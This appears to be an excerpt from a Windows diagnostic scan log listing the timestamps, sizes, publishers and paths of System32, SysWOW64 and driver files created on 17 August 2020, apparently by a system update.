2020-08-17 21:33 - 2020-08-17 21:33 - 000010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LaunchTM.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000010240 _____ (Microsoft Corporation) C:\Windows\system32\lpksetupproxyserv.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000009216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000009216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iprtprio.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000008704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000008192 _____ (Microsoft Corporation) C:\Windows\system32\msimg32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000008192 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.MonitorSyncProvider.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kbd106.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DMAlertListener.ProxyStub.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000007680 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.SyncConditions.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimg32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000006144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000005632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2020-08-17 21:33 - 2020-08-17 21:33 - 000005632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000004608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000003584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TpmCertResources.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000003072 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000002560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2020-08-17 21:33 - 2020-08-17 21:33 - 000002560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000002560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6r.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000002560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3r.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000002560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000002560 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000002560 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000000357 _____ C:\Windows\system32\DrtmAuthKeyDelegate_From_20190529_To_20200303.bin
2020-08-17 21:33 - 2020-08-17 21:33 - 000000357 _____ C:\Windows\system32\DrtmAuth1KeyDelegate.bin
2020-08-17 21:33 - 2020-08-17 21:33 - 000000315 _____ C:\Windows\system32\DrtmAuth9.bin
2020-08-17 21:33 - 2020-08-17 21:33 - 000000315 _____ C:\Windows\system32\DrtmAuth8.bin
2020-08-17 21:33 - 2020-08-17 21:33 - 000000315 _____ C:\Windows\system32\DrtmAuth7.bin
2020-08-17 21:33 - 2020-08-17 21:33 - 000000315 _____ C:\Windows\system32\DrtmAuth6.bin
2020-08-17 21:33 - 2020-08-17 21:33 - 000000315 _____ C:\Windows\system32\DrtmAuth5.bin
2020-08-17 21:33 - 2020-08-17 21:33 - 000000315 _____ C:\Windows\system32\DrtmAuth4.bin
2020-08-17 21:33 - 2020-08-17 21:33 - 000000315 _____ C:\Windows\system32\DrtmAuth3.bin
2020-08-17 21:33 - 2020-08-17 21:33 - 000000315 _____ C:\Windows\system32\DrtmAuth2.bin
2020-08-17 21:33 - 2020-08-17 21:33 - 000000315 _____ C:\Windows\system32\DrtmAuth12.bin
2020-08-17 21:33 - 2020-08-17 21:33 - 000000315 _____ C:\Windows\system32\DrtmAuth11.bin
2020-08-17 21:33 - 2020-08-17 21:33 - 000000315 _____ C:\Windows\system32\DrtmAuth10.bin
2020-08-17 21:33 - 2020-08-17 21:33 - 000000315 _____ C:\Windows\system32\DrtmAuth1.bin
2020-08-17 21:32 - 2020-08-17 21:33 - 001260744 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 017792512 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 009339392 _____ (Microsoft Corporation) C:\Windows\system32\BingMaps.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 007915864 _____ (Microsoft Corporation) C:\Windows\system32\windows.storage.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 007850784 _____ (Microsoft Corporation) C:\Windows\system32\OneCoreUAPCommonProxyStub.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 007583272 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 007297536 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Data.Pdf.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 007270728 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 006233080 _____ (Microsoft Corporation) C:\Windows\system32\StartTileData.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 006169088 _____ (Microsoft Corporation) C:\Windows\system32\twinui.pcshell.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 006066808 _____ (Microsoft Corporation) C:\Windows\system32\d2d1.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 005890048 _____ (Microsoft Corporation) C:\Windows\system32\Windows.AI.MachineLearning.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 005283776 _____ (Microsoft Corporation) C:\Windows\system32\Windows.StateRepository.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 004898144 _____ (Microsoft Corporation) C:\Windows\system32\rtmpltfm.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 004625184 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 004565248 _____ (Microsoft Corporation) C:\Windows\system32\sppsvc.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 004471296 _____ (Microsoft Corporation) C:\Windows\system32\InputService.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 004227116 _____ C:\Windows\system32\DefaultHrtfs.bin
2020-08-17 21:32 - 2020-08-17 21:32 - 004140544 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsThresholdAdminFlowUI.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 004048896 _____ (Microsoft Corporation) C:\Windows\system32\SRH.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 004014592 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Bluetooth.Service.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 004005376 _____ (Microsoft Corporation) C:\Windows\system32\EdgeContent.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 003984896 _____ (Microsoft Corporation) C:\Windows\system32\tellib.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 003727872 _____ (Microsoft Corporation) C:\Windows\system32\win32kfull.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 003712000 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentServer.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 003655680 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Logon.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 003581240 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 003547648 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 003387392 _____ (Microsoft Corporation) C:\Windows\system32\NetworkMobileSettings.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 003353088 _____ (Microsoft Corporation) C:\Windows\system32\msftedit.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 003327256 _____ (Microsoft Corporation) C:\Windows\system32\CoreUIComponents.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 003263488 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 003260928 _____ (Microsoft Corporation) C:\Windows\system32\esent.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 003187200 _____ (Microsoft Corporation) C:\Windows\system32\CertEnroll.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 003141632 _____ (Microsoft Corporation) C:\Windows\system32\directml.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 003109376 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 003084800 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002871608 _____ (Microsoft Corporation) C:\Windows\system32\aitstatic.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 002870272 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002854400 _____ (Microsoft Corporation) C:\Windows\system32\MapGeocoder.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002808832 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002760704 _____ (Microsoft Corporation) C:\Windows\system32\smartscreen.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 002717696 _____ (Microsoft Corporation) C:\Windows\system32\win32kbase.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 002656256 _____ (Microsoft Corporation) C:\Windows\system32\wlansvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002590208 _____ C:\Windows\system32\dwmscene.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002552120 _____ (Microsoft Corporation) C:\Windows\system32\UpdateAgent.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002523136 _____ (Microsoft Corporation) C:\Windows\system32\UIAutomationCore.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002505496 _____ (Microsoft Corporation) C:\Windows\system32\twinapi.appcore.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002471936 _____ (Microsoft Corporation) C:\Windows\system32\InstallService.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002466304 _____ (Microsoft Corporation) C:\Windows\system32\d3d11.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002448712 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002357248 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Perception.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002321408 _____ (The ICU Project) C:\Windows\system32\icu.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002289152 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.onecore.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002285056 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Graphics.Printing.3D.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002264064 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Bluetooth.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002260312 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002178048 _____ (Microsoft Corporation) C:\Windows\system32\mmgaclient.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002161664 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.PointOfService.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002157056 _____ (Microsoft Corporation) C:\Windows\system32\wlidsvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002150232 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002136064 _____ (Microsoft Corporation) C:\Windows\system32\WpcDesktopMonSvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002114560 _____ (Microsoft Corporation) C:\Windows\system32\Windows.CloudStore.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002074112 _____ (Microsoft Corporation) C:\Windows\system32\ISM.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 002060288 _____ (Microsoft Corporation) C:\Windows\system32\cdprt.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001972536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\refs.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 001960448 _____ (Microsoft Corporation) C:\Windows\system32\aadtb.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001946144 _____ (Microsoft Corporation) C:\Windows\system32\dcomp.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001942528 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001918464 _____ (Microsoft Corporation) C:\Windows\system32\wevtsvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001885184 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001884200 _____ (Microsoft Corporation) C:\Windows\system32\D3D12.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001877504 _____ (Microsoft Corporation) C:\Windows\system32\LocationFramework.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001856000 _____ (Microsoft Corporation) C:\Windows\system32\ConstraintIndex.Search.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001841152 _____ C:\Windows\system32\TextInputMethodFormatter.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001830200 _____ (Microsoft Corporation) C:\Windows\system32\rdpserverbase.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001827328 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Speech.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001787392 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Globalization.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001783296 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Input.Inking.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001766400 _____ (Microsoft Corporation) C:\Windows\system32\wwansvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001764336 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001756592 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2020-08-17 21:32 - 2020-08-17 21:32 - 001751040 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.desktop.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001745728 _____ (Microsoft Corporation) C:\Windows\system32\ContentDeliveryManager.Utilities.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001743680 _____ (Microsoft Corporation) C:\Windows\system32\sppobjs.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001726264 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001723392 _____ (Microsoft Corporation) C:\Windows\system32\Wpc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001717776 _____ (Microsoft Corporation) C:\Windows\system32\AppxPackaging.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001683968 _____ (Microsoft Corporation) C:\Windows\system32\comsvcs.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001660536 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001640448 _____ (Microsoft Corporation) C:\Windows\system32\TaskFlowDataEngine.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001616608 _____ (Microsoft Corporation) C:\Windows\system32\ttdrecordcpu.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001612800 _____ (Microsoft Corporation) C:\Windows\system32\wpncore.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001604608 _____ (Microsoft Corporation) C:\Windows\system32\dosvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001583104 _____ (Microsoft Corporation) C:\Windows\system32\qmgr.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001553408 _____ (Microsoft Corporation) C:\Windows\system32\mmgaserver.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 001540096 _____ (Microsoft Corporation) C:\Windows\system32\WindowManagement.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001536512 _____ (Microsoft Corporation) C:\Windows\system32\UserDataService.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001512848 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 001505592 _____ (Microsoft Corporation) C:\Windows\system32\rdpbase.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001500672 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Web.Http.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001500160 _____ (Microsoft Corporation) C:\Windows\system32\TokenBroker.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001486848 _____ (Microsoft Corporation) C:\Windows\system32\usocoreworker.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 001466368 _____ (Microsoft Corporation) C:\Windows\system32\rdpsharercom.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001447424 _____ (Microsoft Corporation) C:\Windows\system32\VSSVC.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 001428992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bthport.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 001428480 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.Vpn.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001413712 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001396152 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001392128 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.FaceAnalysis.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001385696 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001378528 _____ (Microsoft Corporation) C:\Windows\system32\webservices.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001374208 _____ (Microsoft Corporation) C:\Windows\system32\NotificationController.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001366144 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2020-08-17 21:32 - 2020-08-17 21:32 - 001354080 _____ (Microsoft Corporation) C:\Windows\system32\rtmpal.dl
2020-08-17 21:32 - 2020-08-17 21:32 - 001271296 _____ (Microsoft Corporation) C:\Windows\system32\SEMgrSvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001263856 _____ (Microsoft Corporation) C:\Windows\system32\WpcMon.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 001263616 _____ (Microsoft Corporation) C:\Windows\system32\XblGameSave.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001183744 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Security.Authentication.Web.Core.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001182248 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 001182208 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001159168 _____ (Microsoft Corporation) C:\Windows\system32\MbaeApiPublic.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001158656 _____ (Microsoft Corporation) C:\Windows\system32\Unistore.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001151304 _____ (Microsoft Corporation) C:\Windows\system32\InputHost.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001149712 _____ (Microsoft Corporation) C:\Windows\system32\ApplyTrustOffline.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 001132544 _____ (Microsoft Corporation) C:\Windows\system32\EmailApis.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001127424 _____ (Microsoft Corporation) C:\Windows\system32\WpcRefreshTask.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001123344 _____ (Microsoft Corporation) C:\Windows\system32\MrmCoreR.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001098240 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Signals.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001092096 _____ (Microsoft Corporation) C:\Windows\system32\TpmCoreProvisioning.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001092096 _____ (Microsoft Corporation) C:\Windows\system32\MusUpdateHandlers.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001091936 _____ (Microsoft Corporation) C:\Windows\system32\rtmcodecs.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001086776 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Services.TargetedContent.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001084216 _____ (Microsoft Corporation) C:\Windows\system32\ReAgent.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001081344 _____ (Microsoft Corporation) C:\Windows\system32\ShareHost.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001072128 _____ (Microsoft Corporation) C:\Windows\system32\BTAGService.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001071184 _____ (Microsoft Corporation) C:\Windows\system32\Taskmgr.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 001069064 _____ (Microsoft Corporation) C:\Windows\system32\LicenseManager.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001062912 _____ (Microsoft Corporation) C:\Windows\system32\MPSSVC.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001059840 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.BackgroundTransfer.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001059328 _____ (Microsoft Corporation) C:\Windows\system32\wcmsvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001055232 _____ (Microsoft Corporation) C:\Windows\system32\Windows.AccountsControl.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001051448 _____ (Microsoft Corporation) C:\Windows\system32\pidgenx.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001042944 _____ (Microsoft Corporation) C:\Windows\system32\IKEEXT.DLL
2020-08-17 21:32 - 2020-08-17 21:32 - 001032544 _____ (Microsoft Corporation) C:\Windows\system32\ortcengine.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001029432 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ClipSp.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 001028336 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Perception.Stub.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001027000 _____ (Microsoft Corporation) C:\Windows\system32\ClipSVC.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001008960 _____ (Microsoft Corporation) C:\Windows\system32\CloudExperienceHostCommon.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001008128 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 001005056 _____ (Microsoft Corporation) C:\Windows\system32\ContactApis.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000999616 _____ (Microsoft Corporation) C:\Windows\system32\PCPKsp.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000988160 _____ (Microsoft Corporation) C:\Windows\system32\refsutil.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000986936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\refsv1.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000979264 _____ (Microsoft Corporation) C:\Windows\system32\propsys.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000977408 _____ (Microsoft Corporation) C:\Windows\system32\fontext.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000974336 _____ (Microsoft Corporation) C:\Windows\system32\uDWM.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000963072 _____ (Microsoft Corporation) C:\Windows\system32\wbiosrvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000958608 _____ (Microsoft Corporation) C:\Windows\system32\AppContracts.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000957952 _____ (Microsoft Corporation) C:\Windows\system32\ngcsvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000949760 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Ocr.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000949248 _____ (Microsoft Corporation) C:\Windows\system32\SecurityHealthSSO.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000945192 _____ (Microsoft Corporation) C:\Windows\system32\dxgi.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000943616 _____ (Microsoft Corporation) C:\Windows\system32\PhoneService.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000938496 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000937984 _____ (Microsoft Corporation) C:\Windows\system32\WpcWebFilter.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000931840 _____ (Microsoft Corporation) C:\Windows\system32\InkObjCore.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000931840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdiWiFi.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000922624 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Management.Service.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000919880 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000917800 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentClient.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000917504 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Security.Authentication.OnlineId.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000916480 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Core.TextInput.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000904192 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.SmartCards.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000893952 _____ (Microsoft Corporation) C:\Windows\system32\FlightSettings.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000878080 _____ (Microsoft Corporation) C:\Windows\system32\BFE.DLL
2020-08-17 21:32 - 2020-08-17 21:32 - 000875424 _____ (Microsoft Corporation) C:\Windows\system32\pkeyhelper.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000874296 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms2.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000865280 _____ (Microsoft Corporation) C:\Windows\system32\SmartcardCredentialProvider.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000863232 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000859944 _____ (Microsoft Corporation) C:\Windows\system32\CoreMessaging.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000858112 _____ (Microsoft Corporation) C:\Windows\system32\schedsvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000851968 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000841728 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_Language.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000841216 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000839680 _____ (Microsoft Corporation) C:\Windows\system32\d3d9on12.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000827904 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Import.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000826880 _____ (Microsoft Corporation) C:\Windows\system32\printfilterpipelinesvc.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000824832 _____ (Microsoft Corporation) C:\Windows\system32\dsreg.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000821232 _____ (Microsoft Corporation) C:\Windows\system32\windows.applicationmodel.datatransfer.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000817152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000811320 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000810496 _____ (Microsoft Corporation) C:\Windows\system32\NgcCtnrSvc.dll
